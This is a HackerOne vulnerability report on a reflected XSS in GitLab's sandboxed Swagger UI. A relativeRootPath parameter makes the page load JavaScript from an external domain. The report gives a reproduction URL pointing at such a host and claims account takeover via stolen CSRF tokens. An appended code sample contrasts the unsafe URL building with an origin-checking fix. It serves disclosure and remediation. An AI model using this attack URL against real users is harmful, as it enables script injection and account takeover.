[gitlab.com] Reflected External Path Injection in Swagger UI at /-/sandbox/swagger via relativeRootPath parameter Leading to XSS & Account Takeover
HackerOne report #3317485 by x0abcd_ on 2025-08-27, assigned to @gandrews7:
Report
Summary:
I discovered a reflected Cross-Site Scripting (XSS) vulnerability on https://gitlab.com/-/sandbox/swagger via the relativeRootPath parameter. This vulnerability allows an attacker to inject an external domain that serves malicious JavaScript, which is then executed in the context of gitlab.com.
The vulnerable code can be found here: https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/assets/javascripts/blob/openapi/index.js
import { joinPaths, relativePathToAbsolute, getBaseURL, getParameterByName, setUrlParams } from '~/lib/utils/url_utility';

// Path of the sandboxed Swagger UI page (the endpoint named in this report).
const SANDBOX_FRAME_PATH = '/-/sandbox/swagger';

// Builds the src of the sandbox iframe and forwards the instance's
// relative_url_root to it as the relativeRootPath query parameter.
const getSandboxFrameSrc = () => {
  const path = joinPaths(gon.relative_url_root || '', SANDBOX_FRAME_PATH);
  const absoluteUrl = relativePathToAbsolute(path, getBaseURL());
  const displayOperationId = getParameterByName('displayOperationId');
  const params = { displayOperationId };
  if (window.gon?.relative_url_root) {
    params.relativeRootPath = window.gon.relative_url_root;
  }
  return setUrlParams(params, absoluteUrl);
};
By abusing this behavior, an attacker can execute arbitrary JavaScript in the victim’s browser, potentially leading to full account takeover by performing authenticated actions using stolen CSRF tokens.
Steps To Reproduce:
- Visit the following URL:
  https://gitlab.com/-/sandbox/swagger?relativeRootPath=https://blog.ryukudz.com
- GitLab will attempt to load JS from:
  https://blog.ryukudz.com/assets/webpack/vendors-openapi.<hash>.chunk.js
- If the attacker controls the external domain, they can serve malicious JS under that path (e.g., redirect to a malicious poc.js).
- Once visited by an authenticated user, the JS executes in the context of gitlab.com.
Impact
Arbitrary JavaScript execution
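As an added illustration (not GitLab's code and not part of the report): a simplified model of the asset URL construction the steps above describe, beside the check a fix would need, which resolves relativeRootPath against the page origin and refuses any value that lands on another origin. The origin, chunk file name and attacker host are constructed placeholders.

```javascript
// Constructed values standing in for window.location.origin and the
// hashed webpack chunk named in the report.
const SANDBOX_ORIGIN = 'https://gitlab.com';
const CHUNK_PATH = 'assets/webpack/vendors-openapi.CONSTRUCTEDHASH.chunk.js';

// Simplified model of the reported behaviour: the query value is used as a
// URL prefix as-is, so an absolute URL moves the script load off-origin.
function unsafeChunkUrl(rawRelativeRoot) {
  const root = rawRelativeRoot ?? '';
  return `${root}/${CHUNK_PATH}`;
}

// Resolve the caller-supplied value against the page origin. Absolute URLs,
// protocol-relative (//host) and backslash (\\host) forms, and non-http
// schemes such as javascript: all resolve to a different origin (or to the
// opaque origin "null") and are rejected. Returns a normalised path with no
// trailing slash, or null when the value must not be used.
function safeRelativeRoot(rawRelativeRoot, origin = SANDBOX_ORIGIN) {
  let resolved;
  try {
    resolved = new URL(rawRelativeRoot ?? '', `${origin}/`);
  } catch {
    return null; // unparseable input: treat like an attack, not like ''
  }
  if (resolved.origin !== origin) {
    return null;
  }
  return resolved.pathname.replace(/\/+$/, '');
}

// Hardened counterpart of unsafeChunkUrl: the script URL is always built on
// the page origin, and only the validated path component comes from input.
function sandboxChunkUrl(rawRelativeRoot, origin = SANDBOX_ORIGIN) {
  const root = safeRelativeRoot(rawRelativeRoot, origin);
  if (root === null) {
    return null;
  }
  return `${origin}${root}/${CHUNK_PATH}`;
}
```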